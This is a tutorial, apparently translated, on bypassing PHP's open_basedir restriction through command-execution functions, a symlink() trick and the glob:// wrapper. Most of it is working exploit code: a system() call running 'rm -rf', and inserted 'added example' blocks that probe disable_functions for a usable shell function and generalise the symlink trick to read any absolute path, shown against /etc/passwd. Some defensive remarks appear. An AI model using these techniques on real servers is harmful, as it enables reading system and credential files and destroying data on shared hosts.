This article shares three methods of bypassing PHP's open_basedir restriction to operate on files outside the allowed directories, together with the related tricks; interested readers may find it a useful reference.
0x00 Preparation Knowledge
About open_basedir
open_basedir is a configuration option in php.ini.
It restricts the files a user's script may open to the specified locations.
Suppose open_basedir=/home/wwwroot/home/web1/:/tmp/. Then a user reaching the server through web1 cannot open any file on the server outside those two directories, /home/wwwroot/home/web1/ and /tmp/.
Note that the value given to open_basedir is actually treated as a prefix, not as a directory name.
For example, with open_basedir=/dir/user, both the directory /dir/user and the directory /dir/user1 are accessible. So if you want to restrict access to exactly the specified directory, end the path with a slash.
About Symbolic Links
A symbolic link (also called a soft link) is a special kind of file whose content is the path name (absolute or relative) of another file.
That path may name any file or directory, and it may point across file systems. When you read or write the link, the system transparently redirects the operation to the target file; when you delete the link, only the link itself is removed, not the target.
0x01 Command Execution function
Because the open_basedir setting does not apply to command-execution functions such as system() (the restriction is enforced inside PHP's own file handling, not on the child process PHP spawns), we can use one of those functions to reach the restricted directory.
First create a directory:
/home/puret/test/
and in it create a file 1.txt with the content abc:
nano 1.txt
Then, under that directory, create a subdirectory named b:
mkdir b
and in b create a file 1.php with the content
<?php echo file_get_contents("../1.txt"); ?>
Then set open_basedir in php.ini:
open_basedir = /home/puret/test/b/
Now run 1.php to see whether open_basedir limits our access.
Execution result:
Clearly we cannot read files directly from outside the directory specified by open_basedir.
Next we use the system() function to try to delete 1.txt, going around the open_basedir limit.
Edit 1.php to
<?php system("rm -rf ../1.txt"); ?>
Look at the file before running 1.php:
After running 1.php:
The file was removed: a command-execution function has bypassed open_basedir.
Because command-execution functions are usually disabled through disable_functions, we need to look for other ways to bypass the restriction.
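As an added example (not code from the original article), here is a script for the setup above that contrasts the two access paths in one run: PHP's own file functions, which open_basedir governs, and a child process spawned by a command-execution function, which it does not. It reads rather than deletes 1.txt, and it walks the usual candidates against disable_functions first. The paths, the php.ini values and the function names readViaPhp and readViaShell are assumptions taken from the walkthrough.

```php
<?php
// Added example, not code from the original article. It contrasts PHP's own
// stream layer, which open_basedir governs, with a child process spawned by a
// command-execution function, which it does not, and checks disable_functions
// first. Assumed layout from the walkthrough: run from /home/puret/test/b/
// with open_basedir=/home/puret/test/b/ and the file /home/puret/test/1.txt.

// Read $relPath with a PHP file function. Returns null when open_basedir
// refuses it (PHP emits a warning and file_get_contents() returns false).
function readViaPhp(string $relPath): ?string
{
    $data = @file_get_contents($relPath);
    return $data === false ? null : $data;
}

// Read the same file through a child process. open_basedir is enforced only
// inside PHP; the child is an ordinary program running as the web server user
// and sees whatever that user may read. Returns null when every candidate
// function is unavailable.
function readViaShell(string $relPath): ?string
{
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    $cmd = 'cat ' . escapeshellarg($relPath) . ' 2>/dev/null';

    foreach (['shell_exec', 'exec', 'system', 'passthru'] as $fn) {
        if (!function_exists($fn) || in_array($fn, $disabled, true)) {
            continue;
        }
        switch ($fn) {
            case 'shell_exec':
                return (string) shell_exec($cmd);
            case 'exec':
                exec($cmd, $lines);
                return implode("\n", $lines);
            default:
                // system() and passthru() write straight to stdout; capture it.
                ob_start();
                $fn($cmd);
                return (string) ob_get_clean();
        }
    }
    return null;
}

echo "open_basedir = " . ini_get('open_basedir') . "\n";
$viaPhp   = readViaPhp('../1.txt');
$viaShell = readViaShell('../1.txt');
echo "via PHP file function: " . ($viaPhp === null ? 'blocked by open_basedir' : trim($viaPhp)) . "\n";
echo "via child process:     " . ($viaShell === null ? 'no usable command-execution function' : trim($viaShell)) . "\n";
```

If the second line reports no usable function, disable_functions has closed this route, which is the defensive setting the text mentions. A sane baseline lists system, exec, shell_exec, passthru, popen and proc_open together, since leaving any one of them out leaves the bypass open; open_basedir on its own is a stream-layer filter, not a sandbox.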
0x02 The symlink() function
Let's take a look at the symlink() function:
bool symlink(string $target, string $link)
symlink() creates a symbolic link named $link that points at $target; naturally, both paths are normally checked against open_basedir.
Because early versions of symlink() did not support Windows, the test environment is Linux.
The PHP version tested is 5.3.0; other versions are left for readers to verify for themselves.
On Linux we can chain symlink() calls so that each step passes the check on its own, yet the end result lets us operate on files across directories.
First write the following into /var/www/html/1.php:
<?php
mkdir("c");
chdir("c");
mkdir("d");
chdir("d");
chdir("..");
chdir("..");
// tmplink -> c/d, a link whose target lies inside open_basedir
symlink("c/d", "tmplink");
// while tmplink is a link this resolves to c/d/../../1.txt, i.e. /var/www/html/1.txt
symlink("tmplink/../../1.txt", "exploit");
// replace the link with a real directory; exploit now resolves to /var/www/1.txt
unlink("tmplink");
mkdir("tmplink");
// PHP's own file functions would still refuse the resolved path, so read the link through the web server
echo file_get_contents("http://127.0.0.1/exploit");
?>
Then create 1.txt in /var/www/ with the content
abc
Set open_basedir:
open_basedir = /var/www/html/
Write a PHP script in the html directory to check open_basedir:
<?php echo file_get_contents("../1.txt"); ?>
Run it:
As expected, the file cannot be accessed.
Now run the script written above, 1.php.
The content of 1.txt is read successfully; the open_basedir limit has been escaped.
The key to the whole thing is the line
symlink("tmplink/../../1.txt", "exploit");
At that moment tmplink is itself a symbolic link pointing at c/d, so the path exploit refers to resolves to
c/d/../../1.txt
which is /var/www/html/1.txt. Because that path lies within the open_basedir range, the check passes and exploit is created successfully.
After we delete the tmplink symbolic link and create a real directory with the same name, the path stored in exploit is unchanged,
tmplink/../../1.txt
but because tmplink is now a real directory, tmplink/../../ resolves to /var/www/, the directory that holds 1.txt.
The contents of 1.txt can then be read by requesting the symbolic link exploit through the web server, as the script does with http://127.0.0.1/exploit; opening exploit with a PHP file function would still fail, because PHP checks the resolved path against open_basedir.
Of course, simply adding symlink() to disable_functions is enough to stop this, so we need to find more methods.
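The trick generalises beyond ../1.txt. The following is an added example, not the article's own code, that turns the sequence into a function able to fetch any absolute path the web server user can read, computing from the current directory how deep the temporary chain and the ../ hops must be. Assumed, and not stated on the page: the script runs from a web-served directory under open_basedir such as /var/www/html/, symlink() is not disabled, allow_url_fopen is on, and the web server follows symbolic links (Options FollowSymLinks for Apache) and serves that directory at $urlBase. The function name readViaSymlink and the directory name x are made up for this example.

```php
<?php
// Added example, not code from the original article: the symlink trick made
// into a function that can fetch any absolute path the web server user may read.
// Assumptions (not stated on the page): run from a web-served directory inside
// open_basedir (e.g. /var/www/html/), symlink() not disabled, allow_url_fopen
// on, and the web server follows symlinks (Apache: Options FollowSymLinks) and
// serves the current directory at $urlBase.

function readViaSymlink(string $target, string $urlBase): ?string
{
    $cwd = getcwd();
    if ($cwd === false) {
        return null;
    }
    // Components below "/" ("/var/www/html" -> 3): the number of ".." hops
    // needed to climb from $cwd to the filesystem root.
    $depth = count(array_filter(explode('/', $cwd), 'strlen'));
    if ($depth === 0) {
        return null;   // already at "/", nothing to climb
    }
    $hops = str_repeat('../', $depth);

    // A chain of $depth nested directories (x/x/x). While tmplink points at
    // it, "tmplink/../../../" resolves back to $cwd, so the target string
    // handed to symlink() expands to a path under open_basedir and is accepted.
    $chain = implode('/', array_fill(0, $depth, 'x'));
    if (!is_dir($chain) && !mkdir($chain, 0755, true)) {
        return null;
    }

    // Remove leftovers from an earlier run, whichever form they took.
    @unlink('tmplink');
    @rmdir('tmplink');
    @unlink('exploit');
    if (!symlink($chain, 'tmplink')) {
        return null;
    }
    if (!symlink('tmplink/' . $hops . ltrim($target, '/'), 'exploit')) {
        return null;   // open_basedir check refused the expanded target
    }

    // Swap the link for a real directory of the same name. The string stored
    // in exploit is unchanged, but "tmplink/../../../" now resolves to "/".
    unlink('tmplink');
    mkdir('tmplink');

    // PHP itself still checks the resolved path and would refuse to open
    // "exploit", so let the web server read through the link instead.
    $data = @file_get_contents(rtrim($urlBase, '/') . '/exploit');

    // Best-effort cleanup of everything left in the web root.
    @unlink('exploit');
    @rmdir('tmplink');
    for ($i = $depth; $i >= 1; $i--) {
        @rmdir(implode('/', array_fill(0, $i, 'x')));
    }

    return $data === false ? null : $data;
}

$content = readViaSymlink('/etc/passwd', 'http://127.0.0.1/');
echo $content === null ? "bypass failed\n" : $content;
```

The second symlink() call is the one the open_basedir check actually sees, and it passes only because tmplink is still a link into the x chain at that instant; if it returns false, the chain depth and the current directory do not match, which is the first thing to check. On the defensive side, disabling symlink() is the direct fix; turning off FollowSymLinks (or using SymLinksIfOwnerMatch) removes the web server as the reader of the link, which closes the HTTP step this technique depends on.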
0x03 The glob:// pseudo-protocol
glob:// is a pseudo-protocol (stream wrapper) that PHP has provided since version 5.3.0 for filtering directory entries by pattern. Because directory filtering through it is not subject to open_basedir in the version tested here, we can use it to bypass the restriction. Create a directory named test under /var/www/
and create t.php under /var/www/html/ with the content
<?php
$a = "glob:///var/www/test/*.txt";
if ($b = opendir($a)) {
    while (($file = readdir($b)) !== false) {
        echo "filename: " . $file . "\n";
    }
    closedir($b);
}
?>
Execution result:
The file names in the directory are listed, escaping the open_basedir limit. Note that only the names are revealed this way; opening one of the listed files still goes through the ordinary open_basedir check.
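An added example, not from the original page, that wraps the glob:// listing into a reusable function, shows the same listing through DirectoryIterator, and makes the limitation explicit: the wrapper hands back names only, and opening one of the listed files still fails under open_basedir. The function names globList and globListSpl are made up here, and /var/www/test/ is assumed to contain .txt files outside the allowed prefix.

```php
<?php
// Added example, not code from the original article. Lists a directory that
// open_basedir would otherwise hide, via the glob:// wrapper, and shows that
// the listed files still cannot be opened. Assumption: /var/www/test/ holds
// some .txt files and lies outside open_basedir (e.g. open_basedir=/var/www/html/).

// Return the entries under $dir matching $pattern, listed through glob://,
// sorted. Returns null if the wrapper refuses the path.
function globList(string $dir, string $pattern = '*'): ?array
{
    $handle = @opendir('glob://' . rtrim($dir, '/') . '/' . $pattern);
    if ($handle === false) {
        return null;
    }
    $names = [];
    while (($entry = readdir($handle)) !== false) {
        $names[] = $entry;
    }
    closedir($handle);
    sort($names);
    return $names;
}

// The same listing through the SPL iterator, which accepts a glob:// path.
function globListSpl(string $dir, string $pattern = '*'): ?array
{
    try {
        $names = [];
        foreach (new DirectoryIterator('glob://' . rtrim($dir, '/') . '/' . $pattern) as $entry) {
            $names[] = $entry->getFilename();
        }
        sort($names);
        return $names;
    } catch (UnexpectedValueException $e) {
        return null;
    }
}

$dir   = '/var/www/test';
$names = globList($dir, '*.txt') ?? globListSpl($dir, '*.txt') ?? [];
foreach ($names as $name) {
    echo "filename: {$name}\n";
    // Contents remain protected: this goes through the plain file wrapper and
    // is refused under open_basedir (warning suppressed, false returned).
    $data = @file_get_contents($dir . '/' . $name);
    echo '  readable: ' . ($data === false ? 'no (open_basedir)' : 'yes') . "\n";
}
```

What this buys an attacker is reconnaissance: confirming that a directory exists and learning file names (backup copies, configuration files, upload names) outside the web root. Combining it with one of the earlier techniques is what turns a name into contents.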
That is the whole content of this article; I hope it has been helpful to everyone's study.